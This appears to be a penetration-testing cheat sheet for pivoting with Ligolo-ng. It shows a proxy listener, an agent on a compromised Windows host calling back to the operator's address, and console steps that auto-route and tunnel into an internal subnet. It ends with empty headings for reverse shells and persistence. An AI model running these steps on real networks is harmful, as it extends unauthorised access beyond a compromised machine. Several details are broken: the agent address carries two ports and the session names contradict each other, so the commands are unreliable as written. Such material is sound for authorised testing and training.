Ligolo-ng
Pivoting
./proxy [-selfcert | -autocert] -laddr 0.0.0.0:443# When -selfcert is used on the proxy
./agent -connect 10.129.204.146:11601:443 -ignore-cert -retry
# When -autocert is used on the proxy
./agent -connect 10.129.204.146:11601:443 -retry# Receive the agent connection
ligolo-ng » INFO[0052] Agent joined. id=0050569e00f6 name="DOMAIN\x7331@MS01" remote="192.168.103.141:49318"
# List active sessions
ligolo-ng » session
# Choose the target session
? Specify a session : 1 - DOMAIN\x7331@MS01 - 192.168.103.141:49318 - 0050569e00f6
# Configure the routing options
[Agent : OSCP\eric.wallows@MS01] » autoroute
# Choose the target network
? Select routes to add: 10.10.63.141/24
# Create a new interface
? Create a new interface or use an existing one? Create a new interface
INFO[0105] Generating a random interface name...
INFO[0105] Using interface name savinglester
INFO[0105] Creating routes for savinglester...
# Start the tunnel via the newly-created interface
? Start the tunnel? Yes
INFO[0106] Starting tunnel to DOMAIN\x7331@MS01 (0050569e00f6)Port-Forward
Agent Transfer & Execution
Reverse Shell
Persistence
Resources
Last updated